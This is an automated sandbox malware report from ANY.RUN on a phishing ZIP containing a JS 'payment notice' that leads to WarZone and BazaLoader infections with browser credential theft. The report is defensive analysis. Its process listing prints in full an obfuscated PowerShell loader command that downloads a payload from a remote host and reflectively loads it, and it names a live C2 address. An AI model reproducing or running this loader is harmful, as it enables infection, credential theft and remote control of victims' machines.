File name:

15052025_1700_13052025__7915322331.zip

Full analysis: https://app.any.run/tasks/bde12d7d-7aed-4fe5-9da4-f2fd243a9731
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Malware Trends Tracker     >>>
Analysis date: May 15, 2025, 17:11:13
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
arch-scr
susp-powershell
loader
reverseloader
payload
stealer
warzone
bazaloader
Indicators:
MIME: application/zip
File info: Zip archive data, at least v2.0 to extract, compression method=deflate
MD5:

A9850D7E26BCBBB62025C283C111768C

SHA1:

E6A585141082FC76B215A2FF6FCBF2EE8CA79B5A

SHA256:

F32C577CFD35F399BF0BC95F1011AEB4155F11314FC7D41C31D20ED616815A6D

SSDEEP:

192:Bk5P780PdE7g9hmYqucRxgSAczNfZwmhUwOxYc93fCKDF:iDK7g9hmfuciujwmLiF

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Generic archive extractor

      • WinRAR.exe (PID: 4024)

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 4688)

    • Downloads the requested resource (POWERSHELL)

      • powershell.exe (PID: 4688)

    • Dynamically loads an assembly (POWERSHELL)

      • powershell.exe (PID: 4688)

    • Actions looks like stealing of personal data

      • RegSvcs.exe (PID: 5728)

    • WARZONE has been detected (YARA)

      • RegSvcs.exe (PID: 5728)

    • Steals credentials from Web Browsers

      • RegSvcs.exe (PID: 5728)

    • BAZALOADER has been detected (YARA)

      • RegSvcs.exe (PID: 5728)

  • SUSPICIOUS

    • The process bypasses the loading of PowerShell profile settings

      • wscript.exe (PID: 3884)

    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 4688)

    • Possibly malicious use of IEX has been detected

      • wscript.exe (PID: 3884)

    • Starts POWERSHELL.EXE for commands execution

      • wscript.exe (PID: 3884)

    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 3884)

    • Executes script without checking the security policy

      • powershell.exe (PID: 4688)

    • Probably obfuscated PowerShell command line is found

      • wscript.exe (PID: 3884)

    • Connects to unusual port

      • RegSvcs.exe (PID: 5728)

    • Executable content was dropped or overwritten

      • RegSvcs.exe (PID: 5728)

    • Process drops legitimate windows executable

      • RegSvcs.exe (PID: 5728)

    • The process drops C-runtime libraries

      • RegSvcs.exe (PID: 5728)

    • The process drops Mozilla's DLL files

      • RegSvcs.exe (PID: 5728)

  • INFO

    • Disables trace logs

      • powershell.exe (PID: 4688)

    • Manual execution by a user

      • wscript.exe (PID: 3884)

    • Checks supported languages

      • RegSvcs.exe (PID: 5728)

    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 4688)

    • Reads the machine GUID from the registry

      • RegSvcs.exe (PID: 5728)

    • Checks proxy server information

      • powershell.exe (PID: 4688)
      • slui.exe (PID: 976)

    • Reads the computer name

      • RegSvcs.exe (PID: 5728)

    • Found Base64 encoded reflection usage via PowerShell (YARA)

      • powershell.exe (PID: 4688)

    • Found Base64 encoded text manipulation via PowerShell (YARA)

      • powershell.exe (PID: 4688)

    • Creates files or folders in the user directory

      • RegSvcs.exe (PID: 5728)

    • Create files in a temporary directory

      • RegSvcs.exe (PID: 5728)

    • The sample compiled with english language support

      • RegSvcs.exe (PID: 5728)

    • Reads the software policy settings

      • slui.exe (PID: 976)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

WarZone

(PID) Process(5728) RegSvcs.exe
C2 (1)196.251.115.121:4422
BuildIDTFHS94M973
Options
Install FlagFalse
Startup FlagFalse
Reverse Proxy local port5000
Offline logFalse
PersistanceFalse
UAC bypassFalse
Defender bypassFalse
Use ADSFalse
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipRequiredVersion: 20
ZipBitFlag: 0x0800
ZipCompression: Deflated
ZipModifyDate: 2025:05:12 08:01:50
ZipCRC: 0xaabf1cbd
ZipCompressedSize: 11400
ZipUncompressedSize: 1574055
ZipFileName: Ειδοποίηση πληρωμής_79153 22331.JS
No data.
screenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
129
Monitored processes
6
Malicious processes
3
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winrar.exe no specs wscript.exe no specs powershell.exe conhost.exe no specs #WARZONE regsvcs.exe slui.exe

Process information

PID
CMD
Path
Indicators
Parent process
976C:\WINDOWS\System32\slui.exe -EmbeddingC:\Windows\System32\slui.exe
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Activation Client
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
3884"C:\Windows\System32\WScript.exe" "C:\Users\admin\Desktop\Ειδοποίηση πληρωμής_79153 22331.JS"C:\Windows\System32\wscript.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.812.10240.16384
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
3896\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
4024"C:\Program Files\WinRAR\WinRAR.exe" C:\Users\admin\Desktop\15052025_1700_13052025__7915322331.zipC:\Program Files\WinRAR\WinRAR.exeexplorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Version:
5.91.0
Modules
Images
c:\program files\winrar\winrar.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
4688"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -c "$fructificative = 'JGdhbmdidXN0ZXJzID0gJ3R4dC5xam1hdWhzZWgvbW9jLmFpZG5pcmF2LmZlaWhjbGVubmFoYy8vOnNwdHRoJzskcGljbGUgPSAnaHR0cHM6Ly9vbmZpbHRyZS5jb20udHIvd3AtY29udGVudC9naXBoeS5naWYnOyRtaWNyb2xpdGhzID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskbWljcm9saXRocy5IZWFkZXJzLkFkZCgnVXNlci1BZ2VudCcsJ01vemlsbGEvNS4wJyk7JHRpcHVsYSA9ICRtaWNyb2xpdGhzLkRvd25sb2FkRGF0YSgkcGljbGUpOyRhcmNoZW9sb2dpc3QgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkdGlwdWxhKTskY3liZXJzcGVlY2ggPSAnPDxzdWRvX3BuZz4+JzskZGlhbmRlciA9ICc8PHN1ZG9fb2R0Pj4nOyRiYW5pZSA9ICRhcmNoZW9sb2dpc3QuSW5kZXhPZigkY3liZXJzcGVlY2gpOyRzY29ybmZ1bCA9ICRhcmNoZW9sb2dpc3QuSW5kZXhPZigkZGlhbmRlcik7JGJhbmllIC1nZSAwIC1hbmQgJHNjb3JuZnVsIC1ndCAkYmFuaWU7JGJhbmllICs9ICRjeWJlcnNwZWVjaC5MZW5ndGg7JGNydW1taWVyID0gJHNjb3JuZnVsIC0gJGJhbmllOyRtaWxsaWxpdHJlcyA9ICRhcmNoZW9sb2dpc3QuU3Vic3RyaW5nKCRiYW5pZSwgJGNydW1taWVyKTskYXlvbmQgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRtaWxsaWxpdHJlcyk7JHNhd2hvcnNlID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkYXlvbmQpOyRMYXZlcm5hID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJykuSW52b2tlKCRudWxsLCBbb2JqZWN0W11dIEAoJGdhbmdidXN0ZXJzLCcnLCcnLCcnLCdSZWdTdmNzJywnJywnJywnJywnJywnQzpcVXNlcnNcUHVibGljJywnYWRkcmVzcycsJ2pzJywnJywnJywnZGlzcGxheWFibGUnLCcyJywnJykp' -replace '','';$deedless = [System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($fructificative));Invoke-Expression $deedless;"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
5728"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft .NET Services Installation Utility
Version:
4.8.9037.0 built by: NET481REL1
Modules
Images
c:\windows\microsoft.net\framework\v4.0.30319\regsvcs.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\bcrypt.dll
c:\windows\syswow64\user32.dll
WarZone
(PID) Process(5728) RegSvcs.exe
C2 (1)196.251.115.121:4422
BuildIDTFHS94M973
Options
Install FlagFalse
Startup FlagFalse
Reverse Proxy local port5000
Offline logFalse
PersistanceFalse
UAC bypassFalse
Defender bypassFalse
Use ADSFalse
Total events
10 525
Read events
10 514
Write events
11
Delete events
0

Modification events

(PID) Process:(4024) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:3
Value:
C:\Users\admin\Desktop\preferences.zip
(PID) Process:(4024) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:2
Value:
C:\Users\admin\Desktop\chromium_ext.zip
(PID) Process:(4024) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:1
Value:
C:\Users\admin\Desktop\omni_23_10_2024_.zip
(PID) Process:(4024) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:0
Value:
C:\Users\admin\Desktop\15052025_1700_13052025__7915322331.zip
(PID) Process:(4024) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:name
Value:
120
(PID) Process:(4024) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:size
Value:
80
(PID) Process:(4024) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:type
Value:
120
(PID) Process:(4024) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:mtime
Value:
100
(PID) Process:(3884) wscript.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\wscript.exe
Operation:writeName:JScriptSetScriptStateStarted
Value:
2DDE100000000000
(PID) Process:(5728) RegSvcs.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
Operation:writeName:MaxConnectionsPer1_0Server
Value:
10
Executable files
6
Suspicious files
6
Text files
2
Unknown types
0

Dropped files

PID
Process
Filename
Type
5728RegSvcs.exeC:\Users\admin\AppData\Roaming\igcnrvf.tmpbinary
MD5:29A644B1F0D96166A05602FE27B3F4AD
SHA256:BF96902FEB97E990A471492F78EE8386BCF430D66BDAEFDEAFBF912C8CF7CE46
5728RegSvcs.exeC:\Users\admin\AppData\Roaming\.sbapeh.tmpbinary
MD5:A45465CDCDC6CB30C8906F3DA4EC114C
SHA256:4412319EF944EBCCA9581CBACB1D4E1DC614C348D1DFC5D2FAAAAD863D300209
4688powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_ejvnx4jv.vz5.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5728RegSvcs.exeC:\Users\admin\AppData\Local\Temp\softokn3.dllexecutable
MD5:471C983513694AC3002590345F2BE0DA
SHA256:BB3FF746471116C6AD0339FA0522AA2A44A787E33A29C7B27649A054ECD4D00F
5728RegSvcs.exeC:\Users\admin\AppData\Roaming\Dinoljv.tmpbinary
MD5:DC9ADB7DE19A6753CE90AE94738BFDEF
SHA256:884B04032E2E70A002956218E8EC3491F2B753C4596CEE6E4894DC49AFA0A681
5728RegSvcs.exeC:\Users\admin\AppData\Local\Temp\vcruntime140.dllexecutable
MD5:7587BF9CB4147022CD5681B015183046
SHA256:C40BB03199A2054DABFC7A8E01D6098E91DE7193619EFFBD0F142A7BF031C14D
5728RegSvcs.exeC:\Users\admin\AppData\Local\Temp\mozglue.dllexecutable
MD5:75F8CC548CABF0CC800C25047E4D3124
SHA256:FB419A60305F17359E2AC0510233EE80E845885EEE60607715C67DD88E501EF0
5728RegSvcs.exeC:\Users\admin\AppData\Roaming\sxxyk.A.tmpbinary
MD5:414B7F9E82EE13FB08D39D366B2FBEC8
SHA256:6F9AD831D38FF839C0EE3593CC5452D7BE31D9725EE81D3E7AD20E4D91736971
4688powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_xrnzjwip.spp.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5728RegSvcs.exeC:\Users\admin\AppData\Local\Temp\msvcp140.dllexecutable
MD5:109F0F02FD37C84BFC7508D4227D7ED5
SHA256:334E69AC9367F708CE601A6F490FF227D6C20636DA5222F148B25831D22E13D4
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
9
TCP/UDP connections
54
DNS requests
19
Threats
7

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2104
svchost.exe
GET
200
2.19.11.120:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
2104
svchost.exe
GET
200
2.23.246.101:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
6964
SIHClient.exe
GET
200
2.19.11.120:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut_2010-06-23.crl
unknown
whitelisted
6964
SIHClient.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/Microsoft%20Update%20Signing%20CA%202.2.crl
unknown
whitelisted
6964
SIHClient.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Signing%20CA%202.1.crl
unknown
whitelisted
6964
SIHClient.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Signing%20CA%202.2.crl
unknown
whitelisted
6964
SIHClient.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/Microsoft%20Update%20Signing%20CA%202.1.crl
unknown
whitelisted
6964
SIHClient.exe
GET
200
2.19.11.120:80
http://crl.microsoft.com/pki/crl/products/MicTimStaPCA_2010-07-01.crl
unknown
whitelisted
6964
SIHClient.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:138
whitelisted
2104
svchost.exe
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
172.211.123.250:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
FR
whitelisted
4
System
192.168.100.255:137
whitelisted
2104
svchost.exe
2.19.11.120:80
crl.microsoft.com
Elisa Oyj
NL
whitelisted
2104
svchost.exe
2.23.246.101:80
www.microsoft.com
Ooredoo Q.S.C.
QA
whitelisted
6544
svchost.exe
40.126.31.71:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
3216
svchost.exe
172.211.123.250:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
FR
whitelisted
4688
powershell.exe
95.173.189.182:443
onfiltre.com.tr
Netinternet Bilisim Teknolojileri AS
TR
suspicious

DNS requests

Domain
IP
Reputation
google.com
  • 142.250.185.78
whitelisted
client.wns.windows.com
  • 172.211.123.250
  • 172.211.123.248
whitelisted
crl.microsoft.com
  • 2.19.11.120
  • 2.19.11.105
whitelisted
www.microsoft.com
  • 2.23.246.101
  • 95.101.149.131
whitelisted
login.live.com
  • 40.126.31.71
  • 20.190.159.129
  • 20.190.159.131
  • 40.126.31.130
  • 40.126.31.128
  • 20.190.159.4
  • 40.126.31.129
  • 40.126.31.73
whitelisted
onfiltre.com.tr
  • 95.173.189.182
unknown
settings-win.data.microsoft.com
  • 20.73.194.208
  • 4.231.128.59
whitelisted
channelchief.varindia.com
  • 103.249.97.230
unknown
slscr.update.microsoft.com
  • 4.175.87.197
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 52.165.164.15
whitelisted

Threats

PID
Process
Class
Message
Misc activity
INFO [ANY.RUN] USER_AGENTS Suspicious User-Agent (Mozilla/5.0)
Exploit Kit Activity Detected
ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound
Exploit Kit Activity Detected
ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1
Exploit Kit Activity Detected
ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M2
Potentially Bad Traffic
PAYLOAD [ANY.RUN] Reverse Base64 Encoded EXE Inbound
A Network Trojan was detected
ET MALWARE Reverse Base64 Encoded MZ Header Payload Inbound
5728
RegSvcs.exe
Misc Attack
ET DROP Spamhaus DROP Listed Traffic Inbound group 41
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
15052025_1700_13052025__7915322331.zip